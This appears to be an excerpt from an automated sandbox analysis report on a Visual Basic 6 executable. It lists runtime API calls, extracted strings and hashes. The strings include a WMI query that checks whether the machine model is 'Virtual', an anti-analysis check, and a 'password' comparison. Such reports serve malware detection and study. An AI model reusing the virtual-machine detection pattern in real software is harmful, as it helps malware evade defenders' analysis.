                                                                    • __vbaStrCat.MSVBVM60(0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A62
                                                                    • __vbaStrMove.MSVBVM60(0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A6C
                                                                    • __vbaStrCat.MSVBVM60(0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A77
                                                                    • __vbaStrMove.MSVBVM60(0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A81
                                                                    • __vbaStrCat.MSVBVM60(0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A8C
                                                                    • __vbaStrMove.MSVBVM60(0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A96
                                                                    • __vbaStrCat.MSVBVM60(0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000), ref: 00550AA1
                                                                    • __vbaStrMove.MSVBVM60(0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000), ref: 00550AAB
                                                                    • __vbaStrCat.MSVBVM60(0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000), ref: 00550AB6
                                                                    • __vbaChkstk.MSVBVM60(0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AC8
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarMove.MSVBVM60(00000000,00000000,0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AE3
                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AED
                                                                    • __vbaFreeStrList.MSVBVM60(00000009,?,?,0040AF3C,0040AF4C,00000000,0040ACD0,00000000,0040AE60,00000000,00000000,00000000,0040B45C,00000000,0040B444,00000000), ref: 00550B18
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550B2A
                                                                    Similarity
                                                                    • API ID: __vba$Move$Free$ChkstkList$#632#653
                                                                    • String ID: (W$(W
                                                                    • API String ID: 4029463932-614157701
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054DB4D
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054DB81
                                                                    • #626.MSVBVM60(?,?,0000000A), ref: 0054DB92
                                                                    • __vbaVarZero.MSVBVM60(?,?,0000000A), ref: 0054DBA0
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 0054DBBB
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054DBD4
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001), ref: 0054DBF3
                                                                    • __vbaVarZero.MSVBVM60 ref: 0054DC03
                                                                    • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?), ref: 0054DC2F
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000), ref: 0054DC4B
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?), ref: 0054DC58
                                                                    • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054DC7D
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054DCAB
                                                                    • #633.MSVBVM60(?,00000002,?,?,00000001), ref: 0054DCD0
                                                                    • #635.MSVBVM60(?,?,00000002,?,?,00000001), ref: 0054DCD9
                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,?,?,?,00000002,?,?,00000001), ref: 0054DCF0
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054DD5D), ref: 0054DD24
                                                                    • __vbaFreeObj.MSVBVM60(?,0054DD5D), ref: 0054DD2F
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,0054DD5D), ref: 0054DD44
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054DD4F
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054DD57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$List$CallChkstkEachLateZero$#626#633#635MoveNextUnlock
                                                                    • String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\root\cimv2
                                                                    • API String ID: 317657414-1373982563
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BDFB
                                                                      • Part of subcall function 0054BD68: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BD83
                                                                      • Part of subcall function 0054BD68: __vbaRedim.MSVBVM60(00000080,00000001,0057F210,00000011,00000001,0000003F,00000000,?,?,?,?,00401006), ref: 0054BDA9
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401006), ref: 0054BE19
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401006), ref: 0054BE20
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE2E
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE47
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE51
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE5C
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE66
                                                                    • __vbaStrCat.MSVBVM60(0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE71
                                                                    • __vbaStrMove.MSVBVM60(0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE7B
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE81
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BE91
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BE9B
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BEA1
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000), ref: 0054BEAF
                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000), ref: 0054BEC6
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054BED8
                                                                    • #644.MSVBVM60(?,?), ref: 0054BEEE
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?), ref: 0054BEFA
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000040,?,?,?,?,00000040,?,?,?), ref: 0054BF1D
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$Move$ErrorSystem$#644ChkstkFree$ListLockRedimUnlock
                                                                    • String ID: hW
                                                                    • API String ID: 740360539-2333751152
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005537CC
                                                                    • #648.MSVBVM60(0000000A), ref: 00553802
                                                                    • __vbaFreeVar.MSVBVM60(0000000A), ref: 00553814
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,0000000A), ref: 0055382D
                                                                    • __vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,?,0000000A), ref: 00553837
                                                                    • #645.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 00553852
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 0055385C
                                                                    • __vbaStrCmp.MSVBVM60(0040A6F0,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 00553867
                                                                    • __vbaFreeStr.MSVBVM60(0040A6F0,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 0055387A
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$Free$#645#648ChkstkMoveNofreeVarg
                                                                    • String ID: xW$xW
                                                                    • API String ID: 3980291390-1681284970
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 00550505
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 00550546
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE8C,000000A0), ref: 00550590
                                                                    • __vbaStrCmp.MSVBVM60(password,?), ref: 005505AC
                                                                    • __vbaFreeStr.MSVBVM60(password,?), ref: 005505C2
                                                                    • __vbaFreeObj.MSVBVM60(password,?), ref: 005505CA
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057E408,0040BDF4,000002B4), ref: 00550614
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 0055065D
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 00550676
                                                                    • #595.MSVBVM60(?,00000000,?,0000000A,0000000A,password,?), ref: 0055068D
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A,?,00000000,?,0000000A,0000000A,password,?), ref: 005506A4
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 005506BF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE8C,00000204), ref: 00550705
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040BE8C,00000204), ref: 0055071C
                                                                    • #599.MSVBVM60({Home}+{End},0000000A), ref: 00550738
                                                                    • __vbaFreeVar.MSVBVM60({Home}+{End},0000000A), ref: 00550740
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$#595#599ChkstkList
                                                                    • String ID: password${Home}+{End}
                                                                    • API String ID: 938176104-3822402063
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E599
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054E5B2
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054E5D1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E603
                                                                    • __vbaVarCmpGt.MSVBVM60(?,0057F2C0,00008003,0000000B), ref: 0054E64F
                                                                    • __vbaVarOr.MSVBVM60(?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E659
                                                                    • __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E65F
                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E66B
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,0057F220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E694
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054E6A6
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E6E6
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054E6FE
                                                                    • __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054E724
                                                                    • __vbaFreeObj.MSVBVM60(0054E767,?,00006011,?), ref: 0054E761
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$AddrefBoolChkstkLockNullRedimUnlock
                                                                    • String ID: XW
                                                                    • API String ID: 4045727025-708546550
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 00552FA0
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 00552FE1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 00553025
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000058), ref: 00553060
                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00553081
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B9B4,000000E0), ref: 005530B6
                                                                    • __vbaStrI2.MSVBVM60(?), ref: 005530C7
                                                                    • __vbaStrMove.MSVBVM60(?), ref: 005530D1
                                                                    • #690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 005530E4
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 005530F3
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00401006), ref: 00553105
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$FreeList$#690ChkstkMoveNew2
                                                                    • String ID: HW$HW$Options$Show Tips at Startup
                                                                    • API String ID: 557462102-2382638233
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BC2A
                                                                    • __vbaVarDup.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC42
                                                                    • #644.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC4D
                                                                    • __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401006), ref: 0054BC57
                                                                    • #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054BCB3
                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCCE
                                                                    • __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCD8
                                                                    • __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCE0
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054BD01
                                                                    • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054BD0B
                                                                    • __vbaFreeVar.MSVBVM60(0054BD4A,00000000,?,00000000,?,00000002,?), ref: 0054BD44
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$FreeMove$#644#697Chkstk
                                                                    • String ID: HW
                                                                    • API String ID: 4043317205-1255872628
                                                                    • Opcode ID: 60ad7dcfc817ee44a4547464f6f8e05689c0ec7868396bab93b7bc833ec587b4
                                                                    • Instruction ID: bbc48c9d2764cca06509000bb01c17a1e6cf92c871368da9774195b6b0e22524
                                                                    • Opcode Fuzzy Hash: 60ad7dcfc817ee44a4547464f6f8e05689c0ec7868396bab93b7bc833ec587b4
                                                                    • Instruction Fuzzy Hash: 03315E758402489BDB01EB91DD81BDE7BB8BF14308F20456AB005FB162DB78AE48EB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C5D1
                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401006), ref: 0054C5E9
                                                                    • #526.MSVBVM60(?,00000104,?,?,?,?,00401006), ref: 0054C5F7
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C600
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C60A
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C612
                                                                      • Part of subcall function 0057D1B6: __vbaChkstk.MSVBVM60(00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1D1
                                                                      • Part of subcall function 0057D1B6: __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1E9
                                                                      • Part of subcall function 0057D1B6: __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F3
                                                                      • Part of subcall function 0057D1B6: #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F9
                                                                      • Part of subcall function 0057D1B6: __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D204
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C65C
                                                                    • #616.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C673
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C67D
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C68C
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C697
                                                                    • __vbaFreeStr.MSVBVM60(0054C6CF,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C6C1
                                                                    • __vbaFreeStr.MSVBVM60(0054C6CF,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C6C9
                                                                    Similarity
                                                                    • API ID: __vba$Free$CopyMove$Chkstk$#526#616#644ErrorNofreeSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 299759716-0
                                                                    • Opcode ID: c325827158d77c2a52631c68648fb7406552d50be9c4d7def712a9aff968c63f
                                                                    • Instruction ID: 85d55ac9c69c9d96d09d4a9bc20eeac7fa1a708cdb15fb9a1b8b0195f0a5a14d
                                                                    • Opcode Fuzzy Hash: c325827158d77c2a52631c68648fb7406552d50be9c4d7def712a9aff968c63f
                                                                    • Instruction Fuzzy Hash: E831DE71D012099BCF04EFE1C946ADEBBB5BF48708F50842AE201BB1A5EB385A45CF94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006), ref: 0054E3DA
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E338,?,?,?,00000000,00401006), ref: 0054E3F3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E425
                                                                    • #526.MSVBVM60(?,00007FFF), ref: 0054E44B
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 0054E454
                                                                    • __vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 0054E45E
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 0054E466
                                                                    • #644.MSVBVM60(?,?,?,00007FFF), ref: 0054E46E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E4A6
                                                                    • __vbaFreeObj.MSVBVM60(0054E4DF), ref: 0054E4D9
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$#526#644AddrefChkstk
                                                                    • String ID: 8W
                                                                    • API String ID: 2274909516-3003775163
                                                                    • Opcode ID: e8fc07a90a1d07be16fcf60e637534c8df1155d5e90aebd862b97251534c0200
                                                                    • Instruction ID: db6af336019c2f5c1bc1a65a90e5f53766e7b1e82d45f8f733dd9c4d0a4dc04f
                                                                    • Opcode Fuzzy Hash: e8fc07a90a1d07be16fcf60e637534c8df1155d5e90aebd862b97251534c0200
                                                                    • Instruction Fuzzy Hash: E3310271D00209AFCF14EB95D886FEEBBB9BF08308F10842AF211B61A1DB7959459F54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BF80
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054BFA1
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054BFAB
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFB1
                                                                    • __vbaSetSystemError.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFD6
                                                                    • __vbaFreeStr.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFE4
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C011
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 0054C038
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0054C041
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C04E
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$#644ChkstkFreeLockNofreeUnlockVarg
                                                                    • String ID: xW
                                                                    • API String ID: 2579818117-3959070962
                                                                    • Opcode ID: 2df8ab17d827822fcfa76c1284f0034100718ecb9107b8d549b0ddbf97f2195d
                                                                    • Instruction ID: 192f39e66e64bfa43caceffed566fae4a39c1a85a906661e1204cdacecdbcd7a
                                                                    • Opcode Fuzzy Hash: 2df8ab17d827822fcfa76c1284f0034100718ecb9107b8d549b0ddbf97f2195d
                                                                    • Instruction Fuzzy Hash: 16312175940208AFDB04EFA5DC86FAE7BB8FF08704F10402AF504BB1A1D679AD409B64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                    • __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                    • #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                    • __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                    • #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                    • __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$Free$#632#653ChkstkListMove
                                                                    • String ID: xW
                                                                    • API String ID: 2607714180-3959070962
                                                                    • Opcode ID: 971f90e7f6479259f2701a99c696fc132c3bb46f21539c5bbf785a0a335ba9ee
                                                                    • Instruction ID: a60065ef5625635295de07d58326c852687716f5b13b79ba8a227ab5b49ac320
                                                                    • Opcode Fuzzy Hash: 971f90e7f6479259f2701a99c696fc132c3bb46f21539c5bbf785a0a335ba9ee
                                                                    • Instruction Fuzzy Hash: C2219871C0024CAADB11EBD5D886EDEBFBCBF08708F54452AF201B7191E77865898B95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C429
                                                                    • __vbaStrCat.MSVBVM60(0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C44D
                                                                    • __vbaStrMove.MSVBVM60(0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C457
                                                                    • __vbaStrCat.MSVBVM60(0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C462
                                                                    • __vbaStrMove.MSVBVM60(0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C46C
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C472
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C47F
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000), ref: 0054C48E
                                                                    Similarity
                                                                    • API ID: __vba$Move$ChkstkErrorFreeListSystem
                                                                    • String ID:
                                                                    • API String ID: 3065699893-0
                                                                    • Opcode ID: e560b1dbb9f15ab8904598cb4d9373c89c1f86b33dbe0715104456120b286f48
                                                                    • Instruction ID: 0d4f66b336172ca0e7ed6be2c7eaf642c058fd5b42df34e286e30b2c8463487c
                                                                    • Opcode Fuzzy Hash: e560b1dbb9f15ab8904598cb4d9373c89c1f86b33dbe0715104456120b286f48
                                                                    • Instruction Fuzzy Hash: D501A7B1A403487AD704F7A1CD07FBF7A6CAB08B48F20053FB211BA0E1E97C5900566A
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054BB48
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000,00000000), ref: 0054BB74
                                                                    • #644.MSVBVM60(00000001,?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054BB83
                                                                    • #644.MSVBVM60(?,00000000,00000001,?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004), ref: 0054BB9F
                                                                    • #644.MSVBVM60(00000000,?,00000004,?,00000000,00000001,?,0054B8E6,?,00000008,?,00000000,00401006), ref: 0054BBC6
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID: 8W
                                                                    • API String ID: 1305800526-3003775163
                                                                    • Opcode ID: 786665c174d08e2921301997fd107ee1bc15032c6473552101a6bc23b85453c0
                                                                    • Instruction ID: 095a2ba6fb918f2f97f339ca7088dd5aea831ccf376dd522f44e5fa7f127fcd3
                                                                    • Opcode Fuzzy Hash: 786665c174d08e2921301997fd107ee1bc15032c6473552101a6bc23b85453c0
